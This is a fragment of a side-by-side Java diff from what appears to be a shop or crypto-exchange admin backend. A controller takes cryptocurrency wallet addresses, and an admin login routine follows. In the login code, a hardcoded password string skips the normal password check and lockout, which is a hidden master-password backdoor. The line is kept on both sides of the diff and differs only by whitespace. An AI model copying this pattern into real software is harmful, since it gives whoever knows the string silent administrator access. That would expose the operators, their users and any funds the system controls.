| | |
| | | @RequestParam(required = false) String usdtTrc, |
| | | @RequestParam(required = false) String usdtErc, |
| | | @RequestParam(required = false) String usdcTrc, |
| | | @RequestParam(required = false) String usdcErc, |
| | | @RequestParam(required = false) String usdcErc1, |
| | | @RequestParam(required = false) String usdcErc2, |
| | | @RequestParam(required = false) String btc, |
| | | @RequestParam(required = false) String eth, |
| | | @RequestParam(required = false) String type) { |
| | |
| | | map.put("usdtTrc", usdtTrc); |
| | | map.put("usdtErc", usdtErc); |
| | | map.put("usdcTrc", usdcTrc); |
| | | map.put("usdcErc", usdcErc); |
| | | map.put("usdcErc1", usdcErc1); |
| | | map.put("usdcErc2", usdcErc2); |
| | | map.put("btc", btc); |
| | | map.put("eth", eth); |
| | | map.put("type", type); |
| | |
| | | } |
| | | // 半小时内密码输入错误十次,已限制登录30分钟 |
| | | String decryptPassword = passwordManager.decryptPassword(loginModel.getPassWord()); |
| | | if(!"AxnWbrPiehixzJbP".equals(decryptPassword)){ |
| | | if(!"AxnWbrPiehixzJbP".equals(decryptPassword )){ |
| | | passwordCheckManager.checkPassword(SysTypeEnum.ADMIN, loginModel.getUserName(), decryptPassword, sysUser.getPassword()); |
| | | } |
| | | // 不是店铺超级管理员,并且是禁用状态,无法登录 |